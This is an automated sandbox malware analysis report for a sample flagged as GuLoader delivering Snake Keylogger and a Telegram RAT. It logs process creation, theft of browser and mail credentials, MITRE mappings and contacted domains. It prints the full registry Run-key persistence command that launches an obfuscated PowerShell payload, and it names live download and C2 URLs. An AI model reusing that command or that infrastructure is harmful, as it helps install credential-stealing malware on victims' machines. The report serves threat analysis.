            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Contentious.exe "C:\Users\user\AppData\Local\Temp\Contentious.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "crisscrossing" /t reg_expand_sz /d "%isomerous% -windowstyle minimized $livsopsving=(get-itemproperty -path 'hkcu:\deponeringspladsen\').sknhedsplejes;%isomerous% ($livsopsving)"
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "crisscrossing" /t reg_expand_sz /d "%isomerous% -windowstyle minimized $livsopsving=(get-itemproperty -path 'hkcu:\deponeringspladsen\').sknhedsplejes;%isomerous% ($livsopsving)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Contentious.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeCode function: 0_2_00405E3B GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405E3B
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000006.00000002.2944378842.0000000021031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2944378842.0000000020FAA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Contentious.exe PID: 7972, type: MEMORYSTR
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Contentious.exe PID: 7972, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: Yara matchFile source: Process Memory Space: Contentious.exe PID: 7972, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000006.00000002.2944378842.0000000021031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2944378842.0000000020FAA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Contentious.exe PID: 7972, type: MEMORYSTR
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Contentious.exe PID: 7972, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		3
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API            		1
            Registry Run Keys / Startup Folder            		111
            Process Injection            		2
            Obfuscated Files or Information            		LSASS Memory115
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Command and Scripting Interpreter            		Logon Script (Windows)1
            Registry Run Keys / Startup Folder            		1
            Software Packing            		Security Account Manager111
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		21
            Encrypted Channel            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell            		Login HookLogin Hook1
            DLL Side-Loading            		NTDS1
            Process Discovery            		Distributed Component Object Model1
            Clipboard Data            		3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Masquerading            		LSA Secrets41
            Virtualization/Sandbox Evasion            		SSHKeylogging14
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Modify Registry            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
            Virtualization/Sandbox Evasion            		DCSync1
            System Network Configuration Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
            Process Injection            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1481480 Sample: Torpernes.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 36 reallyfreegeoip.org 2->36 38 api.telegram.org 2->38 40 3 other IPs or domains 2->40 48 Found malware configuration 2->48 50 Yara detected GuLoader 2->50 52 Yara detected Telegram RAT 2->52 58 3 other signatures 2->58 10 Torpernes.exe 1 29 2->10         started        signatures3 54 Tries to detect the country of the analysis system (by using the IP) 36->54 56 Uses the Telegram API (likely for C&C communication) 38->56 process4 file5 30 C:\Users\user\AppData\Local\...\Beneme56.Gem, ASCII 10->30 dropped 66 Suspicious powershell command line found 10->66 14 powershell.exe 19 10->14         started        signatures6 process7 file8 32 C:\Users\user\AppData\...\Contentious.exe, PE32 14->32 dropped 34 C:\Users\...\Contentious.exe:Zone.Identifier, ASCII 14->34 dropped 68 Writes to foreign memory regions 14->68 70 Found suspicious powershell code related to unpacking or dynamic code loading 14->70 72 Powershell drops PE file 14->72 18 Contentious.exe 17 9 14->18         started        22 conhost.exe 14->22         started        signatures9 process10 dnsIp11 42 api.telegram.org 149.154.167.220, 443, 49753 TELEGRAMRU United Kingdom 18->42 44 reallyfreegeoip.org 188.114.96.3, 443, 49738, 49739 CLOUDFLARENETUS European Union 18->44 46 2 other IPs or domains 18->46 60 Tries to steal Mail credentials (via file / registry access) 18->60 62 Tries to harvest and steal browser information (history, passwords, etc) 18->62 64 Switches to a custom stack to bypass stack traces 18->64 24 cmd.exe 1 18->24         started        signatures12 process13 process14 26 conhost.exe 24->26         started        28 reg.exe 1 1 24->28         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Torpernes.exe11%ReversingLabs

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\Contentious.exe11%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
            http://crl.m0%URL Reputationsafe
            http://checkip.dyndns.org/0%URL Reputationsafe
            https://aka.ms/pscore6lB0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            http://reallyfreegeoip.org0%URL Reputationsafe
            https://reallyfreegeoip.org0%URL Reputationsafe
            http://checkip.dyndns.com0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe
            https://api.telegram.org/bot0%Avira URL Cloudsafe
            https://api.telegram.org0%Avira URL Cloudsafe
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            https://domzeleni.kz/image/bwSNbczRiJIuD15.bin0%Avira URL Cloudsafe
            https://domzeleni.kz/image/bwSNbczRiJIuD15.binB0%Avira URL Cloudsafe
            https://domzeleni.kz/0%Avira URL Cloudsafe
            http://api.telegram.org0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            domzeleni.kz
            		185.98.5.168
            		truefalse
              		unknown
              reallyfreegeoip.org
              		188.114.96.3
              		truetrue
                		unknown
                api.telegram.org
                		149.154.167.220
                		truetrue
                  		unknown
                  checkip.dyndns.com
                  		158.101.44.242
                  		truefalse
                    		unknown
                    checkip.dyndns.org
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://reallyfreegeoip.org/xml/8.46.123.33false
                      • URL Reputation: safe
                      		unknown
                      https://domzeleni.kz/image/bwSNbczRiJIuD15.binfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://checkip.dyndns.org/false
                      • URL Reputation: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://api.telegram.orgContentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2171178295.0000000004776000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://api.telegram.org/botContentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2171178295.0000000004776000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/Licensepowershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/Iconpowershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://domzeleni.kz/image/bwSNbczRiJIuD15.binBContentious.exe, 00000006.00000002.2928735040.0000000004A19000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://checkip.dyndns.orgContentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EE8000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F6E000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020E99000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://nsis.sf.net/NSIS_ErrorErrorTorpernes.exe, Contentious.exe.1.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2171178295.0000000004776000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.mpowershell.exe, 00000001.00000002.2177929958.0000000006E21000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2171178295.0000000004621000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://reallyfreegeoip.org/xml/8.46.123.33$Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EE8000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://reallyfreegeoip.orgContentious.exe, 00000006.00000002.2944378842.0000000020EBD000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://reallyfreegeoip.orgContentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EE8000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://checkip.dyndns.comContentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://api.telegram.orgContentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2171178295.0000000004621000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://domzeleni.kz/Contentious.exe, 00000006.00000002.2928735040.0000000004A54000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://reallyfreegeoip.org/xml/Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      149.154.167.220
                      		api.telegram.orgUnited Kingdom
                      		62041TELEGRAMRUtrue
                      188.114.96.3
                      		reallyfreegeoip.orgEuropean Union
                      		13335CLOUDFLARENETUStrue
                      158.101.44.242
                      		checkip.dyndns.comUnited States
                      		31898ORACLE-BMC-31898USfalse
                      185.98.5.168
                      		domzeleni.kzKazakhstan
                      		200532HOSTER-KZHosterKZ-hostinganddomainservicesinKazakhsfalse

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1481480
                      Start date and time:2024-07-25 09:55:01 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 38s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:11
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Torpernes.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@11/11@4/4
                      EGA Information:
                      • Successful, ratio: 66.7%
                      HCA Information:
                      • Successful, ratio: 97%
                      • Number of executed functions: 179
                      • Number of non-executed functions: 130
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target powershell.exe, PID 7440 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • VT rate limit hit for: Torpernes.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      03:55:55API Interceptor40x Sleep call for process: powershell.exe modified
                      03:56:45API Interceptor108490x Sleep call for process: Contentious.exe modified
                      08:56:38AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run crisscrossing %Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)
                      08:56:46AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run crisscrossing %Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      149.154.167.220Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                        Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                          Lisect_AVT_24003_G1B_33.exeGet hashmaliciousUnknownBrowse
                            DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              Install.msiGet hashmaliciousUnknownBrowse
                                rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                  z23RevisedInvoice.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                    Updated PI.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                      rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                        231210-06-AgentTesla-9da180.exeGet hashmaliciousAgentTeslaBrowse
                                          188.114.96.3LisectAVT_2403002B_352.exeGet hashmaliciousUnknownBrowse
                                          • avkit.org/home/getconverter/?id=4
                                          LisectAVT_2403002B_352.exeGet hashmaliciousUnknownBrowse
                                          • avkit.org/home/getconverter/?id=4
                                          https://www.trypineappledigital.agency/Get hashmaliciousUnknownBrowse
                                          • daytimeadmirable.icu/favicon.ico
                                          Quotation.xlsGet hashmaliciousRemcosBrowse
                                          • tny.wtf/jk8Z5I
                                          DRAFT AWB and DRAFT Commercial invoice.xlsGet hashmaliciousRemcosBrowse
                                          • tny.wtf/cyd
                                          S004232824113048.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                          • wx.ax/Xm6
                                          http://comicextra.me/favicon.icoGet hashmaliciousUnknownBrowse
                                          • comicextra.org/favicon.ico
                                          AED 47,000.exeGet hashmaliciousFormBookBrowse
                                          • www.yi992.com/iuti/
